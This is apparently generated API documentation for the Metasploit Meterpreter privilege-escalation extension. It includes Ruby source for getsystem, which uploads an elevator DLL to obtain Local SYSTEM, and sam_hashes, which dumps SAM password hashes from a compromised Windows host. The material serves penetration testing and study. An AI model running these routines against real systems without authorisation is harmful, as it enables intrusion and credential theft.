Class: Rex::Post::Meterpreter::Extensions::Priv::Priv
- Inherits: Rex::Post::Meterpreter::Extension
  - Object
  - Rex::Post::Meterpreter::Extension
  - Rex::Post::Meterpreter::Extensions::Priv::Priv
- Defined in: lib/rex/post/meterpreter/extensions/priv/priv.rb
Overview
This meterpreter extension provides a privilege escalation interface that is capable of doing things like dumping password hashes and performing local exploitation.
Instance Attribute Summary
- #fs ⇒ Object (readonly)
  Modifying privileged file system attributes.
Attributes inherited from Rex::Post::Meterpreter::Extension
Instance Method Summary
- #getsystem(technique = 0) ⇒ Object
  Attempt to elevate the meterpreter to Local SYSTEM.
- #initialize(client) ⇒ Priv (constructor)
  Initializes the privilege escalation extension.
- #sam_hashes ⇒ Object
  Returns an array of SAM hashes from the remote machine.
Constructor Details
#initialize(client) ⇒ Priv
Initializes the privilege escalation extension.

  # File 'lib/rex/post/meterpreter/extensions/priv/priv.rb', line 25

  def initialize(client)
    super(client, 'priv')

    # Make the extension reachable as client.priv
    client.register_extension_aliases(
      [
        {
          'name' => 'priv',
          'ext'  => self
        },
      ])

    # Initialize sub-classes
    self.fs = Fs.new(client)
  end
Instance Attribute Details
#fs ⇒ Object (readonly)
Modifying privileged file system attributes.

  # File 'lib/rex/post/meterpreter/extensions/priv/priv.rb', line 100

  def fs
    @fs
  end
Instance Method Details
#getsystem(technique = 0) ⇒ Object
Attempt to elevate the meterpreter to Local SYSTEM. Returns a two-element array: [true, technique] on success, where technique is the method the server reports it used, or [false, 0] on failure.

  # File 'lib/rex/post/meterpreter/extensions/priv/priv.rb', line 43

  def getsystem( technique=0 )
    request = Packet.create_request( 'priv_elevate_getsystem' )

    elevator_name = Rex::Text.rand_text_alpha_lower( 6 )

    elevator_path = MeterpreterBinaries.path('elevator', client.binary_suffix)
    elevator_path = ::File.expand_path( elevator_path )

    elevator_data = ""

    ::File.open( elevator_path, "rb" ) { |f|
      elevator_data += f.read( f.stat.size )
    }

    request.add_tlv( TLV_TYPE_ELEVATE_TECHNIQUE, technique )
    request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_NAME, elevator_name )
    request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_DLL, elevator_data )
    request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_LENGTH, elevator_data.length )

    # as some service routines can be slow we bump up the timeout to 90 seconds
    response = client.send_request( request, 90 )

    # the server reports which technique actually succeeded
    technique = response.get_tlv_value( TLV_TYPE_ELEVATE_TECHNIQUE )

    if( response.result == 0 and technique != nil )
      client.core.use( "stdapi" ) if not client.ext.aliases.include?( "stdapi" )
      client.sys.config.getprivs
      # record the escalation in the framework database when one is active
      if client.framework.db and client.framework.db.active
        client.framework.db.report_note(
          :host      => client.sock.peerhost,
          :workspace => client.framework.db.workspace,
          :type      => "meterpreter.getsystem",
          :data      => {:technique => technique}
        ) rescue nil
      end
      return [ true, technique ]
    end

    return [ false, 0 ]
  end
#sam_hashes ⇒ Object
Returns an array of SAM hashes from the remote machine, one SamUser object per line of the server's response.

  # File 'lib/rex/post/meterpreter/extensions/priv/priv.rb', line 88

  def sam_hashes
    # This can take a long long time for large domain controllers, bump the timeout to one hour
    response = client.send_request(Packet.create_request('priv_passwd_get_sam_hashes'), 3600)

    response.get_tlv_value(TLV_TYPE_SAM_HASHES).split(/\n/).map { |hash|
      SamUser.new(hash)
    }
  end